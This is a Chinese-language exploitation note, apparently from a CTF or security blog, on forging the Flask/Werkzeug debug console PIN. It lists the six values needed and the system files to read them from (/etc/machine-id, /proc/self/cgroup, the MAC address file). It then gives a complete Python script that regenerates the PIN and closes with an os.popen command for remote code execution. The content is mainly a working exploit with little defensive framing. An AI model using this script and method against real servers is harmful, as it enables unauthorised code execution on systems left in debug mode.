flask debug pin安全
flask在debug模式下会生成一个Debugger PIN,比如:
@ubuntu:~/Code/flask$ python3 app.py
* Running on http://0.0.0.0:8080/ (Press CTRL+C to quit)
* Restarting with stat
* Debugger is active!
* Debugger pin code: 169-851-075
利用pin码可以在报错界面执行任意python代码
而观察这个pin码的生成机制,可以发现pin码是固定的
原理可以查阅文章Flask debug pin安全问题 - 先知社区 (aliyun.com),这里记录下漏洞利用方法
利用
条件
需要六个值:
username #一般为root
modname #一般为flask.app
getattr(app, '__name__', getattr(app.__class__, '__name__')) #一般为Flask
getattr(mod, '__file__', None),
str(uuid.getnode()), #/sys/class/net/eth0/address
get_machine_id(), #/etc/machine-id、/proc/self/cgroup
-
前三个值一般都是固定的
-
第四个值是绝对路径,在debug报错中有
-
第五个一般是/sys/class/net/eth0/address,用file读取出来是十六进制,将其转换成十进制
-
第六个也用file读取,将两个路径依次读取然后拼接
将值拿到手后扔进脚本即可:
import hashlib
from itertools import chain
probably_public_bits = [
'root',# username
'flask.app',# modname
'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python3.5/site-packages/flask/app.py' # getattr(mod, '__file__', None),绝对路径
]
private_bits = [
'2485376925256',# str(uuid.getnode()), /sys/class/net/ens33/address
'c31eea55a29431535ff01de94bdcf5cf68586ce0a884092f32452633ffd1b2a66778a4c7616c94f7e70e8ce4e32cdb41'# get_machine_id(), /etc/machine-id 加上 /proc/self/cgroup 两个值拼接
]
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num
print(rv)
得到了pin码,即可在控制台中使用os命令的popen进行RCE:
import os
os.popen('ls /').read()
